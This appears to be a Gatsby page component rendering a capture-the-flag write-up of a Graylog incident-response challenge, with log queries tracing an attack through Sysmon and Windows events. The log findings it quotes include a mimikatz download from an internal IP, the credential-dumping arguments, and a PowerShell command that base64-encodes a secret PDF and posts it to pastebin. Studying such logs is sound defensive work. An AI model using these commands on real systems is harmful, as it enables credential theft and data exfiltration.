import React from 'react';
import Entry from '../entry';
import { Flex, Text } from 'rebass';
import { useStaticQuery, graphql } from "gatsby"
import Img from "gatsby-image"
// https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554993664.pdf
export default () => {
  const title = 'Graylog';
  const hints = [(<Flex flexDirection='row' flexWrap='wrap'><Text mr={2}>[Pepper Minstix] </Text><a href="http://docs.graylog.org/en/3.1/pages/queries.html">Graylog Docs</a></Flex>),
  ];
  const assignment = `It's me - Pepper Minstix.
Normally I'm jollier, but this Graylog has me a bit mystified.
Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala.
Some Elf U computers were hacked, and I've been tasked with performing incident response.
Can you help me fill out the incident response report using our instance of Graylog?
It's probably helpful if you know a few things about Graylog.
Event IDs and Sysmon are important too. Have you spent time with those?
Don't worry - I'm sure you can figure this all out for me!
Click on the All messages Link to access the Graylog search interface!
Make sure you are searching in all messages!
The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner.
Login with the username elfustudent and password elfustudent.`;
  const data = useStaticQuery(graphql`
    query {
      cranGraylog: file(relativePath: { eq: "cranGraylog.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      graylog1: file(relativePath: { eq: "graylog1.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      graylog2: file(relativePath: { eq: "graylog2.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      graylog3: file(relativePath: { eq: "graylog3.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      graylog4: file(relativePath: { eq: "graylog4.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      graylog5: file(relativePath: { eq: "graylog5.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      graylog6: file(relativePath: { eq: "graylog6.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      graylog7: file(relativePath: { eq: "graylog7.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      graylog8: file(relativePath: { eq: "graylog8.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      graylog9: file(relativePath: { eq: "graylog9.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      graylog10: file(relativePath: { eq: "graylog10.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      graylogSuccess: file(relativePath: { eq: "graylogSuccess.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      grQuery1: file(relativePath: { eq: "grQuery1.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      grQuery2: file(relativePath: { eq: "grQuery2.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      grQuery3: file(relativePath: { eq: "grQuery3.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      grQuery4: file(relativePath: { eq: "grQuery4.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      grQuery5: file(relativePath: { eq: "grQuery5.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      grQuery6: file(relativePath: { eq: "grQuery6.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      grQuery7: file(relativePath: { eq: "grQuery7.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      grQuery8: file(relativePath: { eq: "gQuery8.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      grQuery9: file(relativePath: { eq: "grQuery9.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }
      grQuery10: file(relativePath: { eq: "grQuery10.png" }) {
        childImageSharp {
          fluid(maxWidth: 500) {
            ...GatsbyImageSharpFluid
          }
        }
      }


    }
  `);
  const extra = (
    <>
    <Img fluid={data.cranGraylog.childImageSharp.fluid}
            style={{ margin: 0,  maxHeight: '35vh', width: '72vw' }}
            imgStyle={{ objectFit: 'contain' }}
    />
    <Text mb={1} fontSize='13px' alignSelf='center'>Location: Dormitory</Text>
    </>
  );

  return (
    <Entry
      title={title}
      hints={hints}
      extra={extra}
      assignment={assignment}
    >
      <Text>It was more convenient to access the Graylog instance at <code>https://graylog.elfu.org/</code> and fill out the report at <code>https://report.elfu.org/</code>. To find these URLs we look at the GET requests in Network Tab of Dev Tools upon opening the terminal.</Text>
      <br />
      <Text mt={2}>1. Graylog Query: <code>EventID:2 AND TargetFilename:/.*cookie.*/ AND ProcessImage:/.*firefox.*/</code> </Text>
      <Text>We're looking for a new file creation event (EventID 2 in Sysmon), the file name contains "cookie", and the process that created it is Firefox. The query returns one result, and its "TargetFilename" is the answer.</Text>
      <Img fluid={data.graylog1.childImageSharp.fluid}
              style={{ margin: 0,  maxHeight: '36vh', width: '70vw' }}
              imgStyle={{ objectFit: 'contain' }}
      />

      <br />
      <Text mt={2}>2. Graylog Query: <code>ProcessImage:/.*cookie_recipe\.exe/ AND EventID:3</code> </Text>
      <Text mb={2}>We know that the binary's name is "cookie_recipe.exe", so we look for the network connections in makes (Event ID 3 in Sysmon). The query returns one result, its DestinationIp and DestinationPort are the answer.</Text>
      <Img fluid={data.graylog2.childImageSharp.fluid}
              style={{ margin: 0,  maxHeight: '36vh', width: '70vw' }}
              imgStyle={{ objectFit: 'contain' }}
      />

      <br />
      <Text mt={2}>3. Graylog Query: <code>EventID:1 AND ParentProcessImage:/.*cookie_recipe\.exe/ AND CommandLine:/.*\/c.*/</code> </Text>
      <Text mb={2}>The query returns 16 results. We sort them by time in ascending order and the entry with CommandLine <code>C:\Windows\system32\cmd.exe /c "whoami "</code> will be on top.</Text>
      <Img fluid={data.graylog3.childImageSharp.fluid}
              style={{ margin: 0,  maxHeight: '36vh', width: '70vw' }}
              imgStyle={{ objectFit: 'contain' }}
      />

      <br />
      <Text mt={2}>4. Graylog Query: <code>ParentProcessImage:/.*cookie_recipe\.exe/ AND CommandLine:/.*service.*/</code> </Text>
      <Text mb={2}>We're looking for all command line entries of processes initiated by "cookie_recipe.exe" that contain "service". The query returns 5 results. In the first two the attacker is querying the system to find services, on the other three results he uses "webexservice".</Text>
      <Img fluid={data.graylog4.childImageSharp.fluid}
              style={{ margin: 0,  maxHeight: '36vh', width: '70vw' }}
              imgStyle={{ objectFit: 'contain' }}
      />

      <br />
      <Text mt={2}>5. Graylog Query: <code> /.*mimikatz.*/</code> </Text>
      <Text mb={2}>Mimikatz is a popular tool to dump credentials. The query returns 5 results. The CommandLine section of two of them contains helpful information. We see that the attacker first downloaded mimikatz to "cookie.exe" <code>C:\Windows\system32\cmd.exe /c "Invoke-WebRequest -Uri http://192.168.247.175/mimikatz.exe -OutFile C:\cookie.exe "</code> and then ran it: <code>C:\cookie.exe" privilege::debug sekurlsa::logonpasswords exit</code></Text>
      <Img fluid={data.graylog5.childImageSharp.fluid}
              style={{ margin: 0,  maxHeight: '36vh', width: '70vw' }}
              imgStyle={{ objectFit: 'contain' }}
      />

      <br />
      <Text mt={2}>6. Graylog Query: <code>EventID:4624 AND SourceNetworkAddress:192.168.247.175</code> </Text>
      <Text mb={2}>From question 2 we know the SourceNetworkAddress. Windows Event 4624 means successful login. The query returns 15 results and all of the have "alabaster" as AccountName.  </Text>
      <Img fluid={data.graylog6.childImageSharp.fluid}
              style={{ margin: 0,  maxHeight: '36vh', width: '70vw' }}
              imgStyle={{ objectFit: 'contain' }}
      />

      <br />
      <Text mt={2}>7. Graylog Query: <code>EventID:4624 AND LogonType:10</code> </Text>
      <Text mb={2}>LogonType 10 of Windows Event 4624 is RemoteInteractive (Terminal Services, Remote Desktop or Remote Assistance). The query returns one result. Its timestamp is the answer.</Text>
      <Img fluid={data.graylog7.childImageSharp.fluid}
              style={{ margin: 0,  maxHeight: '36vh', width: '70vw' }}
              imgStyle={{ objectFit: 'contain' }}
      />

      <br />
      <Text mt={2}>8. Graylog Query: <code>SourceHostName:ELFU-RES-WKS2 AND _exists_:LogonType AND _exists_:DestinationHostname</code> </Text>
      <Text mb={2}>From the previous question's query we know that SourceHostName is <code>ELFU-RES-WKS2</code>. We also know that any file system navigation happenned after 2019-11-19 06:04:28, so will set time selector to "from" 2019-11-19 06:04:29 "to" 2019-11-19 06:24:00 and search for all logs that have any DestinationHostname and LogonType. The query returns 4 results. All these results have LogonType 3 and DestinationHostname <code>elfu-res-wks3</code>  </Text>
      <Img fluid={data.graylog8.childImageSharp.fluid}
              style={{ margin: 0,  maxHeight: '36vh', width: '70vw' }}
              imgStyle={{ objectFit: 'contain' }}
      />

      <br />
      <Text mt={2}>9. Graylog Query: <code>EventID:2 AND TargetFilename:/.*research.*/</code> </Text>
      <Text mb={2}>We look for all file creation events (2) that has "research" in the name. The query returns two results. One from November 18, that looks like the original creation date. The other result has date November 19, which is the day of the attack. The full path of TargetFilename of Nov 19 entry is the answer. </Text>
      <Img fluid={data.graylog9.childImageSharp.fluid}
              style={{ margin: 0,  maxHeight: '36vh', width: '70vw' }}
              imgStyle={{ objectFit: 'contain' }}
      />

      <br />
      <Text >10. Graylog Query: <code>CommandLine: /.*POST.*/</code> </Text>
      <Text >{`Exfiltration means a POST request. The query will return 1 result. In the result's command line we confirm that secret research document was exfiltrated:`} <code>{`C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe Invoke-WebRequest -Uri https://pastebin.com/post.php -Method POST -Body @{ "submit_hidden" = "submit_hidden"; "paste_code" = $([Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\\Users\\alabaster\\Desktop\\super_secret_elfu_research.pdf"))); "paste_format" = "1"; "paste_expire_date" = "N"; "paste_private" = "0"; "paste_name"="cookie recipe" }`}</code>.{`Very soon after that the POST request will be executed, so we click on "show surrounding messages" -> 5 seconds. Only one new entry will show up. It will be with EventID 3, Network Connection and DestinationHostName "pastebin", its DestinationIp is the answer. `}</Text>
      <Img fluid={data.graylog10.childImageSharp.fluid}
              style={{ margin: 0,  maxHeight: '36vh', width: '70vw' }}
              imgStyle={{ objectFit: 'contain' }}
      />

      <Text my={2}>Done!</Text>
      <Img fluid={data.graylogSuccess.childImageSharp.fluid}
              style={{ margin: 0,  maxHeight: '36vh', width: '70vw' }}
              imgStyle={{ objectFit: 'contain' }}
      />

    </Entry>
  )

};
